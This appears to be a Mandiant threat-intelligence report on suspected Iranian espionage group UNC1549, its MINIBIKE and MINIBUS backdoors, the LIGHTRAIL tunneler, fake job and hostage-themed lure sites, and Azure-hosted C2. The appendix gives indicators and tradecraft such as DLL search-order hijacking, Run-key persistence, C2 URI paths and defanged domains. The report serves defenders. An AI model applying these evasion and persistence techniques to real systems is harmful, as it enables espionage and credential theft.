<p>This blog post details the suspected UNC1549 operations since June 2022, the ongoing development of their proprietary malware, their network of over 125 Azure command-and-control (C2) subdomains, and their attack lifecycle, which includes tactics, techniques, and procedures (TTPs) Mandiant has not previously seen deployed by Iran.</p>
<h2>Attribution</h2>
<p>Mandiant assesses with moderate confidence that this activity has ties to UNC1549, an Iran-based espionage group, which overlaps with activities publicly known as <a href="https://about.fb.com/wp-content/uploads/2022/04/Meta-Quarterly-Adversarial-Threat-Report_Q1-2022.pdf" rel="noopener" target="_blank"><u>Tortoiseshell</u></a> and <a href="https://learn.microsoft.com/en-us/microsoft-365/security/defender/microsoft-threat-actor-naming?view=o365-worldwide" rel="noopener" target="_blank"><u>Smoke Sandstorm/BOHRIUM</u></a>. </p>
<p>Namely, a fake recruiting website (1stemployer[.]com) was observed hosting a MINIBUS payload in November 2023. The template used for the fake recruiting website had been used previously in another fake recruiting website, careers-finder[.]com, which was used by UNC1549. </p>
<ul>
<li>
<p>In this campaign, the MINIBUS backdoor was hosted on a fake job website (1stemployer[.]com) using the exact same written contents as careers-finder[.]com used by UNC1549 in early 2022, for example, “After considering the career and education background we introduce you to the employer companies which are looking for the indicated skills and expertise.”</p>
</li>
</ul></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/minibike-fig1.max-1000x1000.png" alt="Fake job website 1stemployer[.]com deploying a template similar to a previous UNC1549 website">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="fzpdl">Figure 1: Fake job website 1stemployer[.]com deploying a template similar to a previous UNC1549 website</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><ul>
<li>In addition, like in previous UNC1549 activities, this campaign leveraged .NET applications to deliver the malware—this time the attackers implemented it by using a fake Hamas-affiliated application to deliver the MINIBUS backdoor.</li>
</ul>
<p><strong>According to public </strong><a href="https://www.wired.com/story/facebook-iran-espionage-catfishing-us-military/" rel="noopener" target="_blank"><strong><u>reporting</u></strong></a><strong>, Tortoiseshell, which is tied to UNC1549, is potentially linked to the IRGC</strong>.</p>
<p>In addition, <strong>the focused targeting of Middle East entities</strong> affiliated with the aerospace and defense sectors<strong> is consistent with other Iran-nexus clusters of activity</strong>, some of which are affiliated with the IRGC as well.</p>
<h2>Outlook and Implications</h2>
<p>Mandiant research indicates this campaign remains active as of February 2024, and targeted entities are related to defense, aerospace, and aviation in the Middle East, particularly in Israel and the UAE and potentially in Turkey, India, and Albania. </p>
<p>The intelligence collected on these entities is of relevance to strategic Iranian interests and may be leveraged for espionage as well as kinetic operations. This is further supported by the potential ties between UNC1549 and the IRGC.</p>
<p>The evasion methods deployed in this campaign, namely the tailored job-themed lures combined with the use of cloud infrastructure for C2, may make it challenging for network defenders to prevent, detect, and mitigate this activity. The intelligence and indicators provided in this report may support these efforts and enhance them.</p>
<h2>Attack Lifecycle</h2>
<p>This suspected UNC1549 campaign uses two primary methods to achieve initial access to the targets: spear-phishing and credential harvesting. A typical chain of attack consists of several stages:</p>
<ul>
<li>
<p><strong>Spear-phishing </strong>emails or social media correspondence, disseminating links to<strong> fake websites containing Israel-Hamas related content or fake job offers</strong>. The websites would eventually lead to downloading a malicious payload.</p>
</li>
</ul></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/minibike-fig2.max-1000x1000.png" alt="Fake website posing as the “Bring Them Home Now” movement, calling for the return of Israelis kidnapped by Hamas">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="1s7sn">Figure 2: Fake website posing as the “Bring Them Home Now” movement, calling for the return of Israelis kidnapped by Hamas</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><ul>
<li>
<ul>
<li>The fake job offers were for <strong>tech and defense-related positions</strong>, specifically in the aviation, aerospace, or thermal imaging sectors. </li>
<li>
<p>Mandiant also observed some of the fake job websites that hosted malicious payloads were also used during 2023 to <strong>harvest credentials</strong>.</p>
</li>
</ul>
</li>
</ul></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/minibike-fig3-fig6.max-1000x1000.png" alt="Fake login page masquerading as the aerospace company Boeing">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="1s7sn">Figure 3: Fake login page masquerading as the aerospace company Boeing</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><ul>
<li><strong>Payload delivery</strong>, downloaded from the previously mentioned websites to the target’s computer. The payload is a compressed archive that typically includes two main bundles:</li>
<li>
<ul>
<li>MINIBIKE or MINIBUS—two unique backdoors deployed at least since 2022 (MINIBIKE) and 2023 (MINIBUS), providing full backdoor functionality (see the Technical Appendix for more information).</li>
<li>
<p>A benign lure in the form of an application like OneDrive (MINIBIKE) or, in the case of MINIBUS, a custom application presenting content related to Israelis kidnapped by Hamas hosted on the fake website birngthemhomenow[.]co[.]il mentioned previously.</p>
</li>
</ul>
</li>
</ul></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/minibike-fig4-fig13-blurred.max-1000x1000.png" alt="Decoy content used by MINIBUS, related to the “Bring Them Home Now” movement">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="6skve">Figure 4: Decoy content used by MINIBUS, related to the “Bring Them Home Now” movement</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><ul>
<li><strong>Payload installation and device compromise</strong>, achieved after the MINIBIKE or MINIBUS backdoors establish C2 communication, in most cases via Microsoft Azure cloud infrastructure. 
<ul>
<li>The access to the device can be leveraged for multiple purposes, including intelligence collection and as a stepping stone for further access into the targeted network.</li>
<li>This stage may be supported by the use of LIGHTRAIL, a unique tunneler used in the campaign (see the following details).</li>
</ul>
</li>
</ul>
<p>This suspected UNC1549 campaign<strong> deployed several evasion techniques to mask their activity</strong>:</p>
<ul>
<li>Abusing Microsoft Azure infrastructure for C2 and hosting, making it difficult to discern the activity from legitimate network traffic. In some cases, servers geolocated in the targeted countries (Israel and the UAE) were used, further masking the activity.</li>
<li>Using domain naming schemes that include strings that would likely seem legitimate to network defenders, like countries, organizations names, languages or descriptions related to the targeted sector. Following are several examples of indicative Azure domains: 
<ul>
<li><strong><u>il</u></strong>engineeringrssfeed[.]azurewebsites[.]net (“IL Engineering RSS Feed”)</li>
<li>hiring<strong><u>arabic</u></strong>region[.]azurewebsites[.]net (“Hiring Arabic Region”)</li>
<li><strong><u>turk</u></strong>airline[.]azurewebsites[.]net (“Turk Airline”)</li>
</ul>
</li>
<li>
<p>Using job-themed lures, offering various IT and tech-related positions, which are likely to be disseminated legitimately. One of these fake job offers is presented in Figure 5.</p>
</li>
</ul></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/minibike-fig5-fig8.max-1000x1000.png" alt="Fake DJI job offer">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="6skve">Figure 5: Fake job offer on behalf of DJI, a drone manufacturing company (MD5: 4a223bc9c6096ac6bae3e7452ed6a1cd)</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><h2>Malware Families</h2>
<p>Mandiant observed the following custom malware families used in the suspected UNC1549 activity.<br><br></p>
<div align="center">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table><colgroup><col><col><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>Malware Family</strong></p>
</td>
<td>
<p><strong>Description</strong></p>
</td>
<td>
<p><strong>First Seen</strong></p>
</td>
<td>
<p><strong>Last Seen</strong></p>
</td>
</tr>
<tr>
<td>
<p><span>MINIBIKE</span></p>
</td>
<td>
<p><span>A custom backdoor written in C++ capable of file exfiltration and upload, command execution, and more. Communicates using Azure cloud infrastructure.</span></p>
</td>
<td>
<p><span>June 2022</span></p>
</td>
<td>
<p><span>October 2023</span></p>
</td>
</tr>
<tr>
<td>
<p><span>MINIBUS</span></p>
</td>
<td>
<p><span>A custom backdoor that provides a more flexible code-execution interface and enhanced reconnaissance features compared to MINIBIKE</span></p>
</td>
<td>
<p><span>August 2023</span></p>
</td>
<td>
<p><span>January 2024</span></p>
</td>
</tr>
<tr>
<td>
<p><span>LIGHTRAIL</span></p>
</td>
<td>
<p><span>A tunneler, likely based on an open-source Socks4a proxy, that communicates using Azure cloud infrastructure</span></p>
</td>
<td>
<p><span>November 2022</span></p>
</td>
<td>
<p><span>August 2023</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div></div>
<div class="block-paragraph_advanced"><p>MINIBIKE is a custom malware written in C++, used since at least June 2022. Once MINIBIKE is installed, it provides a full backdoor functionality, including directory and file enumeration, collection of system files and information, uploading files, and running additional processes. </p>
<p>The MINIBIKE platform usually consists of three utilities bundled in an archive, delivered via spear phishing:</p>
<ol>
<li>The MINIBIKE backdoor, usually in the form of a .dll or a .dat file</li>
<li>A launcher, executed via search-order-hijacking (SoH), deploying MINIBIKE and setting its persistence using registry keys</li>
<li>A legitimate/fake executable, used to mask the malicious MINIBIKE deployment. Mandiant observed different MINIBIKE versions use three applications for this purpose: Microsoft SharePoint, Microsoft OneDrive, and a fake Hamas-related .NET application.</li>
</ol>
<p>The MINIBIKE platform has been in use since at least June 2022, gradually being developed to several versions distinct from each other in lures, features, and functionality. While Mandiant did not observe any embedded version numbers, <strong>the</strong> <strong>MINIBIKE instances can be divided to the following versions</strong>.<br><br></p>
<div align="center">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table><colgroup><col><col><col><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>Ver.</strong></p>
</td>
<td>
<p><strong>Date</strong></p>
</td>
<td>
<p><strong>Changes (Compared to Earlier Version)</strong></p>
</td>
<td>
<p><strong>Geographies</strong></p>
</td>
<td>
<p><strong>Example MD5</strong></p>
</td>
</tr>
<tr>
<td>
<p><span>1.0</span></p>
</td>
<td>
<p><span>June 2022</span></p>
</td>
<td>
<p><span>- First version</span></p>
<p><span>- C2 server geolocated in Iran (not Azure)</span></p>
<p><span>- Submitted to a public malware repository from Iran</span></p>
<p><span>- Legitimate SharePoint installation as a lure</span></p>
<p><span>- Bundled in an IMG drive (“Screenshot.img”)</span></p>
<p><span>- Export DLL name: “update.dll”</span></p>
</td>
<td>
<p><span>Iran</span></p>
</td>
<td>
<p><span>adef679c6aa6860a<br>a89b775dceb6958b</span></p>
</td>
</tr>
<tr>
<td>
<p><span>1.1</span></p>
</td>
<td>
<p><span>October–November 2022</span></p>
</td>
<td>
<p><span>- </span><strong>First use of Azure subdomains for C2</strong><span> - Three embedded, only one used</span></p>
<p><span>- First use of OneDrive installation as a lure and as a registry key for persistence</span></p>
<p><span>- Export DLL name: “Mini.dll”</span></p>
</td>
<td>
<p><span>UAE, Turkey</span></p>
</td>
<td>
<p><span>409c2ac789015e76<br>f9886f1203a73bc0</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2.0</span></p>
</td>
<td>
<p><span>August 2023</span></p>
</td>
<td>
<p><span>- Three to five Azure C2 domains used subsequently in a loop</span></p>
<p><span>- </span><strong>Bundled in a ZIP file (“Survey.zip”)</strong></p>
<p><span>- Additional obfuscation</span></p>
<p><span>- Additional functionality and commands</span></p>
<p><span>- Export DLL name: “Mini-Junked.dll”</span></p>
</td>
<td>
<p><span>Israel, UAE</span></p>
</td>
<td>
<p><span>691d0143c0642ff7<br>83909f983ccb8ffd</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2.1</span></p>
</td>
<td>
<p><span>August 2023</span></p>
</td>
<td>
<p><span>- Uses “Image Photo Viewer“ registry key for persistence</span></p>
<p><span>- Additional obfuscation</span></p>
<p><span>- Three Azure C2 domains</span></p>
</td>
<td>
<p><span>Israel, India</span></p>
</td>
<td>
<p><span>e3dc8810da71812b<br>860fc59aeadcc350</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2.2</span></p>
</td>
<td>
<p><span>August–October 2023</span></p>
</td>
<td>
<p><span>- Four Azure C2 domains</span></p>
<p><span>- Reverts back to OneDrive registry key for persistence</span></p>
<p><span>- Additional functionality and commands</span></p>
<p><span>- Additional obfuscation</span></p>
<p><span>- Beacon communication looping over three “files”: index.html, favicon.ico, icon.svg</span></p>
<p><span>- Export DLL name: “Micro.dll”</span></p>
</td>
<td>
<p><span>Israel, UAE</span></p>
</td>
<td>
<p><span>054c67236a86d9ab<br>5ec80e16b884f733</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div></div>
<div class="block-paragraph_advanced"><h2>MINIBUS: A RoBUSt Successor?</h2>
<p>Mandiant observed a second backdoor deployed in this campaign, which bears multiple similarities to MINIBIKE and was therefore named MINIBUS. The MINIBUS platform has been used since at least August 2023, likely during the same time as the latest MINIBIKE versions, though not necessarily to target the same victims. </p>
<p><strong>MINIBUS is a more advanced, updated platform when compared to MINIBIKE</strong>. While similar in functionality and code base, <strong>MINIBUS contains fewer built-in features and a more flexible code-execution and command interface</strong> in addition to more advanced reconnaissance features. </p>
<p>This might make the MINIBUS platform a more suitable option for an experienced operator, which instead of using ready-to-use features may require a more flexible platform. Such an operator may be concerned with operational security (OpSec), possibly as an early stage in a more elaborate  operation.</p>
<p>The following is a more detailed list of the key differences between the MINIBIKE and MINIBUS platforms.</p>
<h3>Functionality</h3>
<ul>
<li>MINIBUS has fewer built-in commands and features when compared with MINIBIKE. Instead, MINIBUS provides a more flexible code-execution and command interface, including the ability to run an executable (for example, a possible next-stage implant) using a single command, unlike MINIBIKE.</li>
<li>MINIBUS has a process enumeration feature. A process list generated by MINIBUS may be useful to avoid detection, for example, by identifying processes related to Virtual Machine (VM) utilities or security applications (such as an EDR). </li>
</ul>
<h3>Export DLL Names</h3>
<p>The MINIBUS bundle contains DLLs with the names “torvaldinitial.dll” for its launcher/installer and “torvaldspersist.dll” for its payload, unlike MINIBIKE, which utilizes export DLL names like “Dr2.dll” or “MspUpdate.dll”  (for its launchers) and “Mini-Junked.dll” or “Micro.dll” (for its payloads).</p>
<h3>C2 Communication</h3>
<p>MINIBUS uses a combination of an Azure subdomain and unique *.com domains for C2 communications, unlike MINIBIKE, which relies only on Azure infrastructure.</p>
<h3>Lures and Themes</h3>
<p><strong>MINIBUS deployed lures related to the Israel-Hamas war</strong>, including a fake .NET application with themes and contents abusing the “Bring Them Home Now” movement, which calls for the return of the Israeli hostages kidnapped by Hamas. In another MINIBUS instance, Mandiant observed a lure related to Quizora, possibly referring to a quiz application.</p>
<h3>Targeting and Geography</h3>
<p>Like MINIBIKE, Mandiant observed MINIBUS targeting <strong>Israel and possibly India and the UAE</strong>. In addition, a MINIBUS C2 domain (cashcloudservices[.]com) had a subdomain with the prefix ns<u>albania</u>hack[.]*, suggesting <strong>an interest in Albania</strong> as well, which is consistent with Iran interests but not yet observed in a MINIBIKE-related activity.</p>
<h2>LIGHTRAIL: Highway to Where?</h2>
<p>In addition to the MINIBIKE and MINIBUS backdoors, Mandiant observed a tunneler named LIGHTRAIL likely affiliated with UNC1549 as well.</p>
<p>LIGHTRAIL has several connections to MINIBIKE and MINIBUS in the form of (1) a shared code base, (2) Azure C2 infrastructure with similar patterns and naming, and (3) overlapping targets and victimology.</p>
<p>LIGHTRAIL communicates with an Azure C2 subdomain of the form <em>*[.]*[.]cloudapp[.]azure[.]com</em>. Mandiant assesses with medium confidence that both LIGHTRAIL and MINIBIKE were used to target the same victim environment at least once.</p>
<p>LIGHTRAIL likely leverages the open-source utility <a href="https://github.com/codewhitesec/Lastenzug" rel="noopener" target="_blank"><u>“Lastenzug”</u></a> (“freight train” in German), a Socks4a proxy based on websockets with a “static obfuscation on [the] assembly level.” LIGHTRAIL’s export DLL is named “lastenzug.dll,” and it shares the same hard-coded User Agent as Lastenzug.</p>
<ul>
<li>Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.10136</li>
</ul>
<p>Mandiant observed two LIGHTRAIL versions used at least since November 2022. Similarly to MINIBIKE, no “official” versions were embedded in LIGHTRAIL’s code, but the instances can be divided to two versions.</p></div>
<div class="block-paragraph_advanced"><div align="center">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table><colgroup><col><col><col><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>Ver.</strong></p>
</td>
<td>
<p><strong>Date</strong></p>
</td>
<td>
<p><strong>Changes (Compared to Earlier Version)</strong></p>
</td>
<td>
<p><strong>Geographies</strong></p>
</td>
<td>
<p><strong>Example MD5</strong></p>
</td>
</tr>
<tr>
<td>
<p><span>1.0</span></p>
</td>
<td>
<p><span>November 2022</span></p>
</td>
<td>
<p><span>- C2 domains: tnlsowki[.]westus3[.]cloudapp[.]azure[.]com</span></p>
<p><span>tnlsowkis[.]westus3[.]cloudapp[.]azure[.]com</span></p>
<p><span>- Export DLL named “lastenzug.dll”, likely referring to the </span><a href="https://github.com/codewhitesec/Lastenzug" rel="noopener" target="_blank"><span>open-source</span></a><span> Socks4a proxy</span></p>
</td>
<td>
<p><span>Turkey</span></p>
</td>
<td>
<p><span>36e2d9ce19ed045a<br>9840313439d6f18d</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2.0</span></p>
</td>
<td>
<p><span>August 2023</span></p>
</td>
<td>
<p><span>- C2 domain: iaidevrssfeed[.]centralus[.]cloudapp[.]azure[.]com</span></p>
<p><span>- Export DLL named “</span><strong>L</strong><span>astenzug.dll” (capital ‘L’)</span></p>
<p><span>- String obfuscation, similar to MINIBIKE</span></p>
</td>
<td>
<p><span>Israel</span></p>
</td>
<td>
<p><span>a5fdf55c1c50be47<br>1946de937f1e46dd</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div></div>
<div class="block-paragraph_advanced"><h2>Credential Harvesting and Fake Job Offers</h2>
<p>Mandiant observed that several websites hosting MINIBIKE payloads also hosted fake login pages in mid-2023 posing as job offers on behalf of legitimate defense and technology-related companies. More specifically, the companies were affiliated with the  aerospace, aviation, and thermal imaging industries.</p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/minibike-fig3-fig6.max-1000x1000.png" alt="Fake login page masquerading as the aerospace company Boeing">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="mmsz9">Figure 6: Fake login page masquerading as the aerospace company Boeing</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/minibike-fig7.max-1000x1000.png" alt="Fake login page masquerading as Teledyne FLIR, a manufacturer of thermal imaging devices">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="mmsz9">Figure 7: Fake login page masquerading as Teledyne FLIR, a manufacturer of thermal imaging devices</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><p>In addition, Mandiant observed suspected UNC1549 infrastructure hosting job description documents for positions in DJI,  a drone manufacturing company, in parallel to a MINIBIKE .zip file. </p>
<p>The documents were likely used as lures in social engineering efforts, either for running malicious files or harvesting credentials.</p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/minibike-fig5-fig8.max-1000x1000.png" alt="Fake DJI job offer">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="mmsz9">Figure 8: Fake DJI job offer (MD5: 4a223bc9c6096ac6bae3e7452ed6a1cd)</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/minibike-fig9.max-1000x1000.png" alt="Fake DJI job offer">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="mmsz9">Figure 9: Fake DJI job offer (MD5: ec6a0434b94f51aa1df76a066aa05413)</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><h2>Technical Appendix</h2>
<h3>MINIBIKE Technical Analysis</h3>
<p>Mandiant observed the following versions of MINIBIKE deployed since 2022.</p>
<h4>Version 1.x, June–November 2022</h4>
<ul>
<li><strong>Payload:</strong> IMG archive named <em>Screenshot.img</em> (example MD5: 409c2ac789015e76f9886f1203a73bc0), containing the following files:
<ul>
<li>Screenshots.lnk - a launcher LNK file (MD5: cb565b1bb128dfc20c8392974ff73e3f)</li>
<li>Setup.exe - a legitimate OneDrive/SharePoint executable (MD5: 400d7190012517677dd5ef2e471f2cd1)</li>
<li>secur32.dll - the MINIBIKE launcher, executed via search-order-hijacking (SoH) (MD5: 54848d17aa76d807e2fd6d196a01ce84)</li>
<li>configur.dll - the MINIBIKE backdoor (MD5: e9ed595b24a7eeb34ac52f57eeec6e2b)</li>
</ul>
</li>
</ul>
<p><strong>Note</strong>: Most of the following analysis refers to version 1.0, but version 1.1 behaves in a similar manner.</p>
<ul>
<li><strong>Execution:</strong> once the IMG archive is mounted, the malicious launcher is executed via SoH and copies the legitimate executable and the MINIBIKE backdoor to the following paths:
<ul>
<li><strong>Legitimate executable: </strong>%LOCALAPPDATA%\Microsoft\OneDrive\configs\FileCoAuth.exe</li>
<li><strong>MINIBIKE backdoor: </strong>%LOCALAPPDATA%\Microsoft\OneDrive\configs\secur32.dll</li>
</ul>
</li>
<li><strong>Persistence:</strong> The loader/installer sets persistence for the MINIBIKE payload by moving it to its staging directory and setting the following Run registry key:
<ul>
<li><strong>Key:</strong> HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDriveFileCoAuth.exe</li>
<li><strong>Value:</strong> %LOCALAPPDATA%\Microsoft\OneDrive\configs\FileCoAuth.exe</li>
</ul>
</li>
<li><strong>Export DLL name:</strong>
<ul>
<li><strong>Version 1.0:</strong><em> “update.dll”</em></li>
<li><strong>Version 1.1:</strong><em><strong> </strong>“Mini.dll”</em></li>
</ul>
</li>
<li><strong>User Agent:</strong>
<ul>
<li><strong>Version 1.0:</strong><em> Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.82 Mobile Safari/537.36</em></li>
<li><strong>Version 1.1:</strong><em><strong> </strong>Mozilla/5.0</em></li>
</ul>
</li>
<li><strong>C2 infrastructure: </strong>
<ul>
<li><strong>Version 1.0:</strong> <em>158.255.74[.]25</em></li>
<li><strong>Version 1.1:</strong><em> homefurniture[.]azurewebsites[.]net</em></li>
</ul>
</li>
<li><strong>C2 URIs:</strong>
<ul>
<li><strong>Version 1.0:</strong>
<ul>
<li><em>/api/blogs/96752</em> - initial beacon and request command</li>
<li><em>/api/blogs/result/96752 </em>- command/request response</li>
<li><em>/api/blogs/download/</em> - download file</li>
<li><em>/api/blogs/result/file/</em> - upload file</li>
</ul>
</li>
<li><strong>Version 1.1:</strong>
<ul>
<li><em>/news/notifications/235722</em> - initial beacon and request command</li>
<li><em>/news/update/ </em>- command/request response</li>
<li><em>/news/image/</em> - download file</li>
</ul>
</li>
</ul>
</li>
<li><strong>Affected geographies:</strong> UAE, Turkey, Iran</li>
</ul>
<h4>Version 2.x, August–October 2023</h4>
<ul>
<li><strong>Payload:</strong> ZIP archive, usually named <em>Survey.zip</em> (example MD5: 691d0143c0642ff783909f983ccb8ffd), containing the following files:
<ul>
<li>Setup.exe - a legitimate executable used to sideload the installer (MD5: ce1054d542dbd999401236f2ce20f826)</li>
<li>secur32.dll - The MINIBIKE backdoor - (MD5: 1e7cf4c172bdabe48714b402d2255707)</li>
<li>lang.dat - a MINIBIKE installer (MD5: 909a235ac0349041b38d84e9aab3f3a1)</li>
</ul>
</li>
<li><strong>Execution:</strong> once the legitimate executable is run, the MINIBIKE installer is sideloaded and the files are copied to the following paths:
<ul>
<li><strong>Legitimate executable:</strong> %LOCALAPPDATA%\Microsoft\Internet Explorer\FileCoAuth.exe</li>
<li><strong>MINIBIKE backdoor: </strong>%LOCALAPPDATA%\Microsoft\Internet Explorer\secur32.dll</li>
</ul>
</li>
<li><strong>Persistence:</strong> The loader/installer sets persistence for the MINIBIKE payload by moving it to its staging directory and setting the following Run registry key:
<ul>
<li><strong>Key: </strong>HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive FileCoAuth</li>
<li><strong>Value:</strong> %LOCALAPPDATA%\Microsoft\Internet Explorer\secur32.dll</li>
</ul>
</li>
</ul>
<p><strong>Note</strong>: Version 2.1 uses ‘Image Photo Viewer’ as a registry key</p>
<ul>
<li><strong>Export DLL name:</strong>
<ul>
<li><strong>Versions 2.0 and 2.1:</strong> <em>“Mini-Junked.dll”</em></li>
<li><strong>Version 2.2: </strong><em>“Micro.dll”</em></li>
</ul>
</li>
</ul>
<p><strong>Note</strong>: In a single instance Mandiant observed the use of “devobj.dll”</p>
<ul>
<li><strong>User Agent:</strong>
<ul>
<li><em><strong>Version 2.0: </strong></em>
<ul>
<li><em>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/539.180 (KHTML, like Gecko) Chrome/110.0.0.2 Safari/538.36 </em></li>
<li><em>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/539.181 (KHTML, like Gecko) Chrome/111.0.0.2 Safari/538.46</em></li>
</ul>
</li>
<li><em><strong>Version 2.1: </strong></em>
<ul>
<li><em>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/539.181 (KHTML, like Gecko) Chrome/111.0.0.2 Safari/538.36</em></li>
<li><em>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/539.181 (KHTML, like Gecko) Chrome/111.0.0.2 Safari/538.46</em></li>
</ul>
</li>
<li><em><strong>Version 2.2:</strong> </em>
<ul>
<li><em>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36</em></li>
</ul>
</li>
</ul>
</li>
</ul>
<p><strong>Note</strong>: In a single instance Mandiant observed the use of “Mozilla/5.0” user agent.</p>
<ul>
<li><strong>C2 infrastructure: </strong>This version of MINIBIKE communicates with three to five Azure subdomains. After every communication it uses the next C2 in a loop, for example:
<ul>
<li><em>blogvolleyballstatus[.]azurewebsites[.]net</em></li>
<li><em>blogvolleyballstatusapi[.]azurewebsites[.]net</em></li>
<li><em>marineblogapi[.]azurewebsites[.]net</em></li>
</ul>
</li>
<li><strong>C2 URIs: </strong>
<ul>
<li><strong>Versions 2.0 and 2.1:</strong>
<ul>
<li><em>/news/notifications/&lt;six_digits&gt;</em> - initial beacon and request command</li>
<li><em>/news/update/ </em>- command/request response</li>
<li><em>/news/image/</em> - download file</li>
</ul>
</li>
<li><strong>Version 2.2:</strong>
<ul>
<li><em>/assets/&lt;six_or_eight_digits&gt;/ {index.html / favicon.ico / icon.svg}</em> - initial beacon and request command</li>
<li><em>/assets/&lt;six_or_eight_digits&gt;/ </em>- command/request response</li>
<li><em>/assets/&lt;six_or_eight_digits&gt;/</em> - download file</li>
<li><em>/assets/&lt;six_or_eight_digits&gt;/</em> - upload file</li>
</ul>
</li>
</ul>
</li>
</ul>
<p><strong>Note</strong>: In a single instance Mandiant observed the use of URIs of the form: blogs/&lt;keywords&gt;</p>
<ul>
<li><strong>Affected geographies:</strong> Israel, UAE, and potentially India</li>
</ul>
<h3>MINIBUS Analysis</h3>
<ul>
<li><strong>Payload:</strong> ZIP archive named <em>bringthemhomenow.zip</em> (MD5: ef262f571cd429d88f629789616365e4), containing the following files:
<ul>
<li>BringThemeHome.exe - a benign executable (MD5: ce1054d542dbd999401236f2ce20f826)</li>
<li>A MINIBUS installer - secur32.dll (MD5: c5dc2c75459dc99a42400f6d8b455250)</li>
